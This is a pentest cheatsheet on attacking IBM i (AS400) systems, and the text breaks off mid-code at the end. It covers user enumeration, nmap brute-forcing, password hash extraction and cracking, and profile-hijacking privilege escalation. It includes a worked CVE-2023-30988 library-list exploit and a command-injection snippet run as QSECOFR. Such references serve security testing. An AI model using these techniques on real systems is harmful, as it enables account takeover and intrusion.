daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

as-400.md (38106B)


      1 ---
      2 title: "AS400"
      3 section: "Cheatsheets"
      4 sectionSlug: "cheatsheets"
      5 sourcePath: "docs/cheatsheets/as-400.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cheatsheets/as-400.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # AS400
     12 
     13 AS400 (IBM i) is a midrange computer system developed by IBM, originally released in 1988. Now known as IBM i running on Power Systems, it is widely used for business applications due to its stability, security, and integrated database (DB2 for i)
     14 
     15 ## Summary
     16 
     17 * [Lab](#lab)
     18 * [Enumeration](#enumeration)
     19 * [Access and Audit](#access-and-audit)
     20 * [Default Credentials](#default-credentials)
     21 * [User Enumeration](#user-enumeration)
     22     * [Telnet](#telnet)
     23     * [POP3](#pop3)
     24     * [FTP](#ftp)
     25 * [Useful Commands](#useful-commands)
     26 * [NMAP Scripts](#nmap-scripts)
     27 * [User Class](#user-class)
     28 * [Authority](#authority)
     29 * [Special Authority](#special-authority)
     30 * [Adopted Authority](#adopted-authority)
     31 * [Password Cracking](#password-cracking)
     32 * [Privilege Escalation](#privilege-escalation)
     33     * [Initial Program Breakout](#initial-program-breakout)
     34     * [Hijack Profile - SECOFR Security Class](#hijack-profile---secofr-security-class)
     35     * [Hijack Profile - Authorities](#hijack-profile---authorities)
     36     * [Hijack Profile - Profile Swapping](#hijack-profile---profile-swapping)
     37     * [Unqualified Library Calls](#unqualified-library-calls)
     38     * [From ALLOBJ to SECADM](#from-allobj-to-secadm)
     39     * [Arbitrary Command Execution](#arbitrary-command-execution)
     40 * [References](#references)
     41 
     42 ## Lab
     43 
     44 * [mainframed/DC30_Workshop](https://github.com/mainframed/DC30_Workshop) - DEFCON 30 Mainframe buffer overlow workshop container
     45 * [mainframed/DVCA](https://github.com/mainframed/DVCA) - Damn Vulnerable CICS Application
     46 
     47     ```ps1
     48     docker run -d \
     49     --name=dvca \
     50     -e HUSER=docker \
     51     -e HPASS=docker \
     52     -p 21:21 \
     53     -p 23:23 \
     54     -p 3270:3270 \
     55     -p 3505:3505 \
     56     -p 3506:3506 \
     57     -p 8888:8888 \
     58     -v /opt/docker/dvca:/config \
     59     -v /opt/docker/dvca/printers:/printers \
     60     -v /opt/docker/dvca/punchcards:/punchcards \
     61     -v /opt/docker/dvca/logs:/logs \
     62     -v /opt/docker/dvca/dasd:/dasd \
     63     -v /opt/docker/dvca/certs:/certs \
     64     --restart unless-stopped \
     65     mainframed767/dvca:latest
     66     ```
     67 
     68 ## Enumeration
     69 
     70 By default, the FTP service send a banner with the following prefix:
     71 
     72 ```ps1
     73 220-QTCP at
     74 ```
     75 
     76 Common ports in AS400 devices:
     77 
     78 ```ps1
     79 20, 21, 23, 25, 80, 110, 137, 138, 139, 389, 443, 446, 448, 449, 512, 910, 992, 2001, 2010, 3000, 5061, 5544, 5555, 5566, 5577, 8470, 8471, 8472, 8473, 8474, 8475, 8476, 9470, 9471, 9472, 9473, 9474, 9475, 9476
     80 ```
     81 
     82 | Name          | Description                                                                                              | Port            | Port (SSL) |
     83 | ------------- | -------------------------------------------------------------------------------------------------------- | --------------- | ---------- |
     84 | FTP           | FTP server is used to access the AS/400 file system                                                      | 20,21           | /          |
     85 | Telnet        | Telnet server is used to access 5250 emulation                                                           | 23              | 992        |
     86 | SMTP          | SMTP server is used to provide mail transfer                                                             | 25              | /          |
     87 | HTTP          | HTTP server is used to provide web page                                                                  | 80              | 443        |
     88 | POP3          | POP3 server is used to provide mail fetch                                                                | 110             | 910        |
     89 | NetServer     | NetServer allows access to AS/400 integrated file system from Windows PCs                                | 137,138,139,445 | /          |
     90 | LDAP          | LDAP provides a network directory service                                                                | 389             | 636        |
     91 | DDM           | DDM server is used to access data via DRDA and for record level access.                                  | 446             | 448        |
     92 | As-svrmap     | Port mapper returns the port number for the requested server.                                            | 449             | /          |
     93 | As-rmtcmd     | Remote command server is used to send commands from a PC to an AS/400 and for program calls.             | 512             | /          |
     94 | As-admin-http | HTTP server administration.                                                                              | 2001            | 2010       |
     95 | As-sts        | Service tools server                                                                                     | 3000            | /          |
     96 | As-mtgc       | Management Central server is used to manage multiple AS/400s in a network.                               | 5555,5544       | 5566,5577  |
     97 | As-central    | Central server is used when a Client Access license is required and for downloading translation tables.  | 8470            | 9470       |
     98 | As-database   | Database server is used for accessing the AS/400 database.                                               | 8471            | 9471       |
     99 | As-dtaq       | Data Queue server allows access to the AS/400 data queues, used for passing data between applications.   | 8472            | 9472       |
    100 | As-file       | File Server is used for accessing any part of the AS/400 file system.                                    | 8473            | 9473       |
    101 | As-netprt     | Printer Server is used to access printers known to the AS/400.                                           | 8474            | 9474       |
    102 | As-rmtcmd     | Remote command server is used to send commands from a PC to an AS/400 and for program calls.             | 8475            | 9475       |
    103 | As-signon     | Sign-on server is used for every Client Access connection to authenticate users and to change passwords. | 8476            | 9476       |
    104 
    105 ## Access and Audit
    106 
    107 **Access**:
    108 
    109 * [tn5250/tn5250](https://github.com/tn5250/tn5250) - A curses-based 5250 terminal client
    110 * [x3270](https://x3270.bgp.nu/) - IBM 3270 terminal emulator
    111 * [ayoul3/wc3270_hacked](https://github.com/ayoul3/wc3270_hacked) - A hacked version of wc3270 that removes field protection and displays hidden fields
    112 * [Mocha TN3270](https://mochasoft.dk/tn3270.htm) - Mocha TN3270 provides TN3270 emulation for IBM Mainframe Access
    113 * [Mocha TN5250](https://mochasoft.dk/tn5250.htm) - Mocha TN5250 provides TN5250 emulation for IBM Mainframe Access
    114 * IBM i Access Client Solutions (5250 Console): `servername.com/WSG` or Telnet
    115 * IBM Navigator for i (Web Interface): `http://systemName:2001`
    116 
    117 Signed-off profiles can still be used—not for opening a 5250 session, but they should work with other protocols.
    118 
    119 All the objects can be queried from the database DB2.
    120 
    121 **Audit**:
    122 
    123 * [hackthelegacy/hack400tool](https://github.com/hackthelegacy/hack400tool/tree/master/dist) - Security handling tools for IBM Power Systems
    124     * [hack400auditor/hack400auditor.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400auditor/hack400auditor.jar)
    125     * [hack400exploiter/hack400exploiter.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400exploiter/hack400exploiter.jar)
    126     * [hack400scanner/hack400scanner.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400scanner/hack400scanner.jar)
    127 * [ayoul3/cicspwn](https://github.com/ayoul3/cicspwn) - CICSpwn is a tool to pentest a CICS Transaction servers on z/OS.
    128 * [ayoul3/cicsshot](https://github.com/ayoul3/cicsshot) - Tool to screenshot CICS transactions
    129 * [sensepost/birp](https://github.com/sensepost/birp) - Big Iron Recon & Pwnage
    130 
    131 ![AS400 Mind Map](https://web.archive.org/web/20140830222720if_/http://www.toolswatch.org/wp-content/uploads/2013/02/AS400.jpg)
    132 
    133 ## Default Credentials
    134 
    135 ```ps1
    136 # Print users with default passwords (Username == Password case insensitive)
    137 # Must have *ALLOBJ and *SECADM special authorities to use this command.
    138 ANZDFTPWD
    139 ```
    140 
    141 Other default profiles:
    142 
    143 ```ps1
    144 QAUTPROF QBRMS QCLUMGT QCLUSTER QCOLSRV
    145 QDBSHR QDBSHRDO QDFTOWN QDIRSRV QDLFM
    146 QDOC QDSNX QEJB QFNC QGATE
    147 QLPAUTO QLPINSTALL QMQM QMQMADM QMSF
    148 QNETSPLF QNFSANON QNOTES QNTP QPEX
    149 QPGMR QPM400 QPRJOWN QRJE QRMTCAL
    150 QSECOFR QSNADS QSPL QSPLJOB QSRV
    151 QSRVBAS QSVCDRCTR QSYS QSYSOPR QTCP
    152 QTFTP QTMHHTP1 QTMHHTTP QTMPLPD QTMTWSG
    153 QTSTRQS QUMB QUSER QYPSJSVR QYPUOWN30
    154 ```
    155 
    156 ## User Enumeration
    157 
    158 ### Telnet
    159 
    160 Authentication Error Messages in **Telnet**
    161 
    162 * CPF1107 : Password not correct for user profile
    163 * CPF1109 : Not authorized to subsystem.
    164 * CPF1110 : Not authorized to work station.
    165 * CPF1116 : Next not valid sign-on attempt varies off device.
    166 * CPF1118 : No password associated with user XYZ.
    167 * CPF1120 – User AABBA does not exist
    168 * CPF1133 Value X Z S is not a valid name
    169 * CPF1392 : Next not valid sign-on disables user profile.
    170 * CPF1394 : User profile XYZ cannot sign on.
    171 
    172 ### POP3
    173 
    174 Authentication Error Messages in **POP3**
    175 
    176 ```ps1
    177 +OK POP3 server ready
    178 USER bogus
    179 +OK POP3 server ready
    180 PASS xyz
    181 -ERR Logon attempt invalid CPF2204
    182 ```
    183 
    184 * CPF2204 : User profile not found
    185 * CPF22E2 : Password not correct for user profile
    186 * CPF22E3 : User profile is disabled
    187 * CPF22E4 : Password for user profile has expired
    188 * CPF22E5 : No password associated with user profile
    189 
    190 ### FTP
    191 
    192 Create a symbolic link to the QSYS library and list *.USRPRF
    193 
    194 ```ps1
    195 open as400.victim.com
    196 as400user
    197 password
    198 quote site namefmt 1
    199 quote site listfmt 1
    200 mkdir /test12345
    201 quote rcmd ADDLNK OBJ('/qsys.lib')
    202 NEWLNK('/test12345/qsys')
    203 dir /test12345/qsys/*.usrprf
    204 ```
    205 
    206 ## Useful Commands
    207 
    208 | Command                                                 | Description                                                    |
    209 | ------------------------------------------------------- | -------------------------------------------------------------- |
    210 | `DSPUSRPRF <user>`                                      | Display user profile                                           |
    211 | `WRKUSRPRF <user>`                                      | Display user, look for Group profile , and Supplemental groups |
    212 | `WRKUSRPRF *ALL`                                        | Display all users                                              |
    213 | `DSPPGM LIB/PROGRAM`                                    | Display program infos                                          |
    214 | `WRKOBJ (*ALL QSYS *LIB)`                               | List libraries                                                 |
    215 | `CHGUSRPRF USRPRF(<USERNAME>) PASSWORD(<NEW_PASSWORD>)` | Setup User Password                                            |
    216 | `QSH`                                                   | Start a QSHELL instance                                        |
    217 
    218 Check strings in PGM/SRVPGM
    219 
    220 ```ps1
    221 cat QLWIUTIL4.SRVPGM | iconv -f cp1141 -t UTF-8 | strings
    222 ```
    223 
    224 ## NMAP Scripts
    225 
    226 * [nse/tn3270-screen](https://nmap.org/nsedoc/scripts/tn3270-screen.html) - Connects to a tn3270 'server' and returns the screen.
    227 
    228     ```ps1
    229     nmap --script tn3270-info,tn3270_screen <host>
    230     ```
    231 
    232 * [nse/tso-enum](https://nmap.org/nsedoc/scripts/tso-enum.html) - TSO User ID enumerator for IBM mainframes (z/OS).
    233 
    234     ```ps1
    235     nmap --script=tso-enum -p 23 <targets>
    236     nmap -sV -p 9923 10.32.70.10 --script tso-enum --script-args userdb=tso_users.txt,tso-enum.commands="logon applid(tso)"
    237     ```
    238 
    239 * [nse/tso-brute](https://nmap.org/nsedoc/scripts/tso-brute.html) - TSO account brute forcer.
    240 
    241     ```ps1
    242     nmap -p 2401 --script tso-brute <host>
    243     ```
    244 
    245 * [nse/cics-user-enum](https://nmap.org/nsedoc/scripts/cics-user-enum.html) - CICS User ID enumeration script for the CESL/CESN Login screen.
    246 
    247     ```ps1
    248     nmap --script=cics-user-enum -p 23 <targets>
    249     nmap --script=cics-user-enum --script-args userdb=users.txt,cics-user-enum.commands="exit;logon applid(cics42)" -p 23 <targets>
    250     ```
    251 
    252 * [nse/cics-user-brute](https://nmap.org/nsedoc/scripts/cics-user-brute.html) - CICS User ID brute forcing script for the CESL login screen.
    253 
    254     ```ps1
    255     nmap --script=cics-user-brute -p 23 <targets>
    256     nmap --script=cics-user-brute --script-args userdb=users.txt,cics-user-brute.commands="exit;logon applid(cics42)" -p 23 <targets>
    257     ```
    258 
    259 * [nse/cics-info](https://nmap.org/nsedoc/scripts/cics-info.html)
    260 
    261     ```ps1
    262     nmap --script=cics-info -p 23 <targets>
    263     nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',cics-info.trans=CICA -p 23 <targets>
    264     ```
    265 
    266 * [nse/cics-enum](https://nmap.org/nsedoc/scripts/cics-enum.html) - CICS transaction ID enumerator for IBM mainframes.
    267 
    268     ```ps1
    269     nmap --script=cics-enum -p 23 <targets>
    270     nmap --script=cics-enum --script-args=idlist=default_cics.txt,cics-enum.command="exit;logon applid(cics42)",cics-enum.path="/home/dade/screenshots/",cics-enum.noSSL=true -p 23 <targets>
    271     ```
    272 
    273 * [nse/lu-enum](https://nmap.org/nsedoc/scripts/lu-enum.html) - Attempts to enumerate Logical Units (LU) of TN3270E servers.
    274 
    275     ```ps1
    276     nmap --script lu-enum --script-args lulist=lus.txt,lu-enum.path="/home/dade/screenshots/" -p 23 -sV <targets>
    277     ```
    278 
    279 * [nse/vtam-enum](https://nmap.org/nsedoc/scripts/vtam-enum.html) -  Brute force those VTAM application IDs
    280 
    281     ```ps1
    282     nmap --script vtam-enum --script-args idlist=defaults.txt,vtam-enum.command="exit;logon applid(logos)",vtam-enum.macros=true,vtam-enum.path="/home/dade/screenshots/" -p 23 -sV <targets>
    283     ```
    284 
    285 ## User Class
    286 
    287 A User Class (USRCLS) defines a predefined set of authorities and system privileges for a user profile. It determines the user's general role and access level within the system. However, a user class alone does not directly grant special authorities (SPCAUT); instead, it serves as a guideline for assigning them.
    288 
    289 In this example, we create a high-privilege user by assigning them the `*SECOFR` (Security Officer) user class (USRCLS). By setting the special authority attribute (SPCAUT) to `*USRCLS`, the system automatically grants the user all special authorities associated with the `*SECOFR` class.
    290 
    291 ```ps1
    292 CRTUSRPRF USRPRF(MYUSER) PASSWORD(MYPASSWORD) USRCLS(*SECOFR) SPCAUT(*USRCLS)
    293 ```
    294 
    295 | User Class                         | Special Authority from User Classes                                                                              |
    296 | ---------------------------------- | ---------------------------------------------------------------------------------------------------------------- |
    297 | `*SECOFR` (Security Officer)       | Full system control, including user management and security. All special authorities                             |
    298 | `*SECADM` (Security Administrator) | Can manage users but not system-wide settings. `*SECADM` special authority                                       |
    299 | `*SYSOPR` (System Operator)        | Can manage system operations but not security settings. `*SAVSYS` and `*JOBCTL` special authority                |
    300 | `*ALLOBJ` (All Object Authority)   | Can access all objects but may lack security control.                                                            |
    301 | `*PGMR`                            | Can create and modify programs but has limited access to system administration functions. No special authorities |
    302 | `*USER`                            | Standard user with minimal privileges, typically for general system use. No special authorities                  |
    303 
    304 ## Authority
    305 
    306 In AS400 (IBM i), authority controls user access to system objects (libraries, files, programs, etc.). It ensures security by defining what users can do with specific objects.
    307 
    308 * `*ALL`: Full access (read, write, delete, execute).
    309 * `*CHANGE`: Modify but not delete.
    310 * `*EXCLUDE`: No access.
    311 * `*USE`: Read-only or execute.
    312 * `*USERDEF`: Custom authority settings based on a user's specific needs.
    313 
    314 Secure authority standard for users:
    315 
    316 * `USRCLS` should be `*USER`
    317 * `SPCAUT` should be `*NONE`
    318 * `AUT` should always be `*EXCLUDE`
    319 * `*USRPRF` should have authority to itself
    320 * `*PUBLIC` should be `*EXCLUDE`
    321 * No other authorities should exist.
    322 
    323 ```ps1
    324 Object . . . . . . . :       XXXXXX           Owner  . . . . . . . :   QSECOFR
    325 Library  . . . . . :         QSYS               Primary group  . . . :   *NONE
    326 Object type  . . . . :       *USRPRF         ASP device . . . . . :   *SYSBAS
    327 
    328                      Object
    329 User Group           Authority
    330 *PUBLIC              *EXCLUDE
    331 QSECOFR              *ALL
    332 XXXXXX               USER DEF
    333 ```
    334 
    335 Special authorities defaults (security level 30 or above)
    336 
    337 | User Class | Special Authority |
    338 | ---------- | ----------------- |
    339 | *SECOFR    | *ALL              |
    340 | *SECADM    | *SECADM           |
    341 | *PGMR      | *NONE             |
    342 | *SYSOPR    | *JOBCTL,*SAVSYS   |
    343 | *USER      | *NONE             |
    344 
    345 ## Special Authority
    346 
    347 Special authority is used to specify the types of actions a user can perform on system resources. A user can be given one or more special authorities.
    348 
    349 * `*ALLOBJ` special authority: All-object (`*ALLOBJ`) special authority allows the user to access any resource on the system whether private authority exists for the user.
    350 * `*SECADM` special authority: Security administrator (`*SECADM`) special authority allows a user to create, change, and delete user profiles.
    351 * `*JOBCTL` special authority: The Job control (`*JOBCTL`) special authority allows a user to change the priority of jobs and of printing, end a job before it has finished, or delete output before it has printed. `*JOBCTL` special authority can also give a user access to confidential spooled output, if output queues are specified `OPRCTL(*YES)`.
    352 * `*SPLCTL` special authority: Spool control (`*SPLCTL`) special authority allows the user to perform all spool control functions, such as changing, deleting, displaying, holding and releasing spooled files.
    353 * `*SAVSYS` special authority: Save system (`*SAVSYS`) special authority gives the user the authority to save, restore, and free storage for all objects on the system, regardless of whether the user has object existence authority to the objects.
    354 * `*SERVICE` special authority: Service (`*SERVICE`) special authority allows the user to start system service tools using the STRSST command. This special authority allows the user to debug a program with only `*USE` authority to the program and perform the display and alter service functions. It also allows the user to perform trace functions.
    355 * `*AUDIT` special authority: Audit (`*AUDIT`) special authority gives the user the ability to view and change auditing characteristics.
    356 * `*IOSYSCFG` special authority: System configuration (`*IOSYSCFG`) special authority gives the user the ability to change how the system is configured. Users with this special authority can add or remove communications configuration information, work with TCP/IP servers, and configure the internet connection server (ICS). Most commands for configuring communications require `*IOSYSCFG` special authority.
    357 
    358 ```ps1
    359 # Print users with special authorities
    360 PRTUSRPRF TYPE(*ALL) SELECT(*SPCAUT) SPCAUT(*ALL)
    361 
    362 # Print rights on a library object
    363 DSPOBJAUT OBJ(MYLIB) OBJTYPE(*LIB)
    364 ```
    365 
    366 **QSECOFR** (short for Security Officer) is the highest-level user profile, similar to the "root" user in Unix/Linux or the "Administrator" account in Windows. It has full control over the system, including security settings, user management, and system configuration.
    367 
    368 The `*ALLOBJ` (All Object Authority) special authority allows a user to access all objects on the system, regardless of their specific object-level permissions. A user with this authority can perform almost any action on the system, making it a powerful and sensitive privilege.
    369 
    370 **QSECOFR** has `*ALLOBJ` by default, along with other special authorities, making it the most powerful user profile on IBM i.
    371 
    372 ## Adopted Authority
    373 
    374 Equivalent of setuid in Linux.
    375 
    376 Adopted Authority allows a user to acquire authority to objects beyond what is granted by `*PUBLIC` and private authorities. As an example, suppose a user should normally be restricted from payroll files, but to perform his job, the user must be able to run a payroll report. Adopted authority allows the user to acquire enough authority to read the file for the purpose of the payroll report without granting the user any authority to the file outside of the program that runs the report.
    377 
    378 Before granting adopted authority to PAYLIST, you must determine what authorities it already has. On an operating system command line, type the following:
    379 
    380 ```ps1
    381 DSPPGM PAYLIB/PAYLIST
    382 ```
    383 
    384 Example of an adopted authority running as QAUTPROF
    385 
    386 ```ps1
    387 Owner: QAUTPROF
    388 User profile: *OWNER
    389 Use adopted authority: *YES
    390 ```
    391 
    392 If User profile is `*OWNER`, the program runs combining the authorities of the Owner of the program with those of the User Profile running the program.
    393 
    394 ## Password Cracking
    395 
    396 **Requirements**:
    397 
    398 * `*ALLOBJ` privileges: Full control over all objects
    399 * `*SECADM` privileges: Profile management, low-level system access
    400 
    401 Extract hashes with **QSYRUPWD**:
    402 
    403 | Description                 | Format | Type       | Example    |
    404 | --------------------------- | ------ | ---------- | ---------- |
    405 | Receiver variable           | Output | Char(*)    | 2000B      |
    406 | Length of receiver variable | Input  | Binary(4)  |            |
    407 | Format                      | Input  | Char(8)    | "UPWD0100" |
    408 | User profile name           | Input  | Char(10)   | userName   |
    409 | Error code                  | I/O    | Char(*)    |            |  
    410 
    411 The output format **UPWD0100** is documented below:
    412 
    413 | Offset Dec | Offset Hex | Type      | Field                        |
    414 | ---------- | ---------- | --------- | ---------------------------- |
    415 |          0 |          0 | BINARY(4) | Bytes returned               |
    416 |          4 |          4 | BINARY(4) | Bytes available              |
    417 |          8 |          8 | CHAR(10)  | User profile name            |
    418 |         18 |         12 | CHAR(*)   | Encrypted user password data |
    419 
    420 **Encrypted password data** hex string
    421 
    422 | Offset (Dec) | Length (Chars) | Field                                              | QPWDLVL        |
    423 | ------------ | -------------- | -------------------------------------------------- | -------------- |
    424 |            0 |             16 | DES 56-bit encrypted password substitute (RFC2877) | 0, 1, 2*       |
    425 |           16 |             16 | DES 56-bit encrypted password substitute (RFC2877) | 0, 1, 2*       |
    426 |           32 |             32 | LM hash                                            | 0, 1, 2*       |
    427 |           64 |              4 | No data                                            |                |
    428 |           68 |             40 | HMAC-SHA1 encrypted password token (RFC4777)?      | 0**, 1**, 2, 3 |
    429 |          108 |             40 | HMAC-SHA1 encrypted password token (RFC4777)?      | 0**, 1**, 2, 3 |
    430 |          148 |              6 | No data                                            |                |
    431 |          154 |            384 | Unknown (hash?) data                               | 0, 1, 2, 3     |
    432 
    433 If the machine is still using the `QPWDLVL < 3`, then an attacker can still recover DES and LM hashes.
    434 
    435 | Hash           | John                                   |
    436 | -------------- | -------------------------------------- |
    437 | LM             | `john --format=LM {filename}`          |
    438 | IBM DES        | `john --format=as400-des {filename}`   |
    439 | SHA1 Uppercase | `john --format=as400-ssha1 {filename}` |
    440 
    441 ```ps1
    442 # Hashcat command for LM hashes
    443 .\hashcat.exe  -m 3000 -a 3 --increment --username -1 ?u?d?s .\hashes.txt ?1?1?1?1?1?1?1
    444 ```
    445 
    446 * [willstruggle/ibmiscanner2john.py](https://github.com/willstruggle/john/blob/master/ibmiscanner2john.py) - Convert files in format userid:hash (e.g files produced by older versions of the ibmiscanner tool) to the as400-sha format that can be processed by JtR
    447 * [hackthelegacy/pwd400gen.py](https://web.archive.org/web/20170224172524/http://www.hackthelegacy.org/attachments/pwd400gen.py) - Password hash generator for IBM Power Systems
    448 
    449 ## Privilege Escalation
    450 
    451 ### Initial Program Breakout
    452 
    453 * Click "`Attn`" button. The attention interrupt key (ATTN) allows the authenticated user to interrupt/end a process and display a menu with additional functions.
    454 * Press `F9` to run commands
    455 
    456 ```ps1
    457 # Spawn a PASE shell
    458 CALL QP2TERM
    459 
    460 # Execute a script
    461 CALL QP2SHELL PARM('/QOpenSys/usr/bin/sh' + '/tmp/scr')
    462 ```
    463 
    464 ### Hijack Profile - SECOFR Security Class
    465 
    466 User profiles assigned with the `*SECOFR` (Security Officer) security class are automatically granted `*ALLOBJ` (All Object) authority, giving them unrestricted access to all system objects. Refer to [User Class](#user-class)
    467 
    468 Display a user profile in several different formats with `DSPUSRPRF`.
    469 
    470 ```ps1
    471 DSPUSRPRF <username>
    472 ```
    473 
    474 The user submitting this must have `*ALLOBJ` and `*JOBCTL` authority.
    475 
    476 * Submitting a Job as `<USERNAME>`
    477 
    478     ```ps1
    479     SBMJOB CMD(DSPJOB) JOB(TESTJOB) USER(<USERNAME>)
    480     ```
    481 
    482 * Then check the job log:
    483 
    484     ```ps1
    485     WRKJOB TESTJOB
    486     ```
    487 
    488 ### Hijack Profile - Authorities
    489 
    490 * Print Public Authority: any user profiles have authority that is not set to the default of `*PUBLIC AUT(*EXCLUDE)`
    491 
    492     ```ps1
    493     PRTPUBAUT OBJTYPE(*USRPRF)
    494     ```
    495 
    496 * Print Private Authority
    497 
    498     ```ps1
    499     PRTPVTAUT OBJTYPE(*USRPRF)
    500     ```
    501 
    502 Look for `*USE` rights or better(e.g. `*CHANGE`, `*ALL`) to someone else's User Profile.
    503 
    504 This `SBMJOB` command will submit a batch job to run under the `HIJACKED_USER` user profile, and will print out the records in the `FILE_OF_HIJACKED_USER` file where the `HIJACKED_USER` User Profile have access.
    505 
    506 > The Submit Job (SBMJOB) command allows a job that is running to submit another job to a job queue to be run later as a batch job. Only one element of request data can be placed on the new job's message queue. - [IBM/SBMJOB](https://www.ibm.com/docs/en/i/7.4?topic=ssw_ibm_i_74/cl/sbmjob.html)
    507 
    508 ```ps1
    509 SBMJOB CMD(CPYF FROMFILE(FILE_OF_HIJACKED_USER) TOFILE(*PRINT)) USER(HIJACKED_USER)
    510 ```
    511 
    512 ### Hijack Profile - Profile Swapping
    513 
    514 Used to change the thread user profile running the application in order to obtain elevated authority.
    515 
    516 * Check the list of profiles
    517 * Grab a profile handle: [`QSYGETPH`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QSYGETPH.htm)
    518 * Set profile based on the token generated by QSYGETPH: [`QWTSETP`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QWTSETP.htm)
    519 * Repeat until you have obtained the highest access level
    520 * Release profile handle: [`QSYRLSPH`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QSYRLSPH.htm)
    521 
    522 ```c
    523 /* Call QSYGETPH to get a profile handle for a user. */
    524 /* NOTE: Change USERPROFILE to the user who you want to swap to. */
    525 CALL QSYS/QSYGETPH ('USERPROFILE' '*NOPWDCHK' &HNDL)
    526 /* Call QWTSETP to swap to the profile. */
    527 CALL QSYS/QWTSETP &HNDL
    528 ```
    529 
    530 | Value       | Description                                                                                                                                                                                                                                                                                                                                                                |
    531 | ----------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
    532 | `*NOPWD`    | The user requesting the profile handle must have `*USE` authority to the user profile. A profile handle does not get created for a disabled user profile. A profile handle does not get created for a user profile with an expired password.                                                                                                                               |
    533 | `*NOPWDCHK` | The user requesting the profile handle must have `*USE` authority to the user profile. If the profile is disabled, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle. If the password is expired, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle. |
    534 | `*NOPWDSTS` | The user requesting the profile handle must have *USE authority to the user profile. A profile handle does not get created for a disabled user profile. If the password is expired, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle.                                                                          |
    535 
    536 You cannot obtain a profile handle for the following system-supplied user profiles:
    537 
    538 ```ps1
    539 QAUTPROF  QDLFM       QMSF      QSNADS      QTSTRQS
    540 QCLUMGT   QDOC        QNETSPLF  QSPL
    541 QCOLSRV   QDSNX       QNFSANON  QSPLJOB
    542 QDBSHR    QFNC        QNTP      QSRVAGT
    543 QDBSHRDO  QGATE       QPEX      QSYS
    544 QDFTOWN   QLPAUTO     QPM400    QTCP 
    545 QDIRSRV   QLPINSTALL  QRJE      QTFTP 
    546 ```
    547 
    548 **JDBC**:
    549 
    550 ```SQL
    551 CREATE OR REPLACE PROCEDURE J_QSYGETPH (IN USERNAME VARBINARY(10), IN PASSWORD VARBINARY(10), OUT HANDLE VARBINARY(12)) EXTERNAL NAME QSYS.QSYGETPH LANGUAGE C++ GENERAL
    552 CALL J_QSYGETPH('USERPROFILE', "*NOPWD", PROFILE_HANDLE)
    553 
    554 CREATE OR REPLACE PROCEDURE J_QWTSETP (IN HANDLE VARBINARY(12)) EXTERNAL NAME QSYS.QWTSETP LANGUAGE C++ GENERAL
    555 CALL J_QWTSETP(PROFILE_HANDLE)
    556 ```
    557 
    558 ### Unqualified Library Calls
    559 
    560 > "applications that use library lists rather than qualified library names have a potential security exposure. A user who is authorized to the commands to work with library lists can potentially run a dierent version of a program." - [ibm.com/security-library-library-lists](https://www.ibm.com/docs/en/i/7.3?topic=security-library-library-lists)
    561 
    562 | Code               | Check      |
    563 | ------------------ | ---------- |
    564 | CALL LIBFOO/OBJBAR | SECURE     |
    565 | CALL OBJBAR        | VULNERABLE |
    566 
    567 **Example**:
    568 
    569 CVE-2023-30988: LIBL abuse, PATH abuse on IBM i - Lirbry List Exploitation
    570 
    571 ```SQL
    572 DSPUSRPRF <user>               -- Display user profile
    573 CRTLIB <user>                  -- Create library
    574 STRSEU <user>/QCLSRC QFQSES    -- Show sources of QFQSES, 
    575                                -- require to compile it
    576                                 PGM
    577                                     CALL QSYS/QCMD
    578                                 ENDPGM
    579 
    580 ADDLIBLE <user>                -- Add user to the libraries
    581 DSPAUTUSR                      -- Display user profile
    582 CALL QFAX/QFFSTRFCPP PARM(1 2) -- Call the vulnerable program
    583 DSPAUTUSR                      -- Display user profile, QAUTPROF and QFAXMSF should be available
    584 CALL <user>/ESCALATE QFAXMSF   -- Profile swapping
    585                                -- require to compile the ESCALATE program
    586                                 PGM PARM(&USER)
    587                                     DCL VAR(&USER) TYPE(*CHAR) LEN(10)
    588                                     DCL VAR(&HANDLE) TYPE(*CHAR) LEN(12)
    589                                     DCL VAR(&ERROR) TYPE(*CHAR) LEN(4)
    590                                     CHGVAR VAR(%BIN(&ERROR)) VALUE(0)
    591                                     CALL PGM(QSYGETPH) PARM(&USER *NOPWD &HANDLE &ERROR)
    592                                     CHGVAR VAR(%BIN(&ERROR)) VALUE(0)
    593                                     CALL PGM(QWTSETP) PARM(&HANDLE &ERROR)
    594                                 ENDPGM
    595 
    596 DSPAUTUSR                      -- Should display all profiles
    597                                -- QFAXMSF has *ALLOBJ
    598 ```
    599 
    600 ### From ALLOBJ to SECADM
    601 
    602 * Query users informations:
    603 
    604     ```c
    605     DSPUSRPRF USRPRF(*ALL) TYPE(*BASIC) OUTPUT(*OUTFILE) OUTFILE(PENTEST/USERDB)
    606     ```
    607 
    608 * Create a CL script to escalate privilege and compile it with `STRPDM` (output is `PRIVESC`)
    609 * Call the generated PGM (program object): `CALL PENTEST/PRIVESC USERWITHSECADM`
    610 
    611 ### Arbitrary Command Execution
    612 
    613 * QSECOFR user - Compile as `.jar` file and run inside QSH: `java -jar /home/user/exploit.jar`
    614 
    615     ```java
    616     // Triggering with JTOpen
    617     sPGMCall.setProgram("/QSYS.LIB/QLWIUTIL4.SRVPGM");
    618     String str = "`id>/tmp/xy.txt`"; // command execution with QSECOFR
    619     ProgramParameter[] programParameterArr = {
    620         new ProgramParameter(2, new AS400Text(str.length() + 1, system).toBytes(str + (char) 0)),
    621         new ProgramParameter(2, new byte[16384], 16384) // hatmanager.jar
    622     };
    623     sPGMCall.setParameterList(programParameterArr);
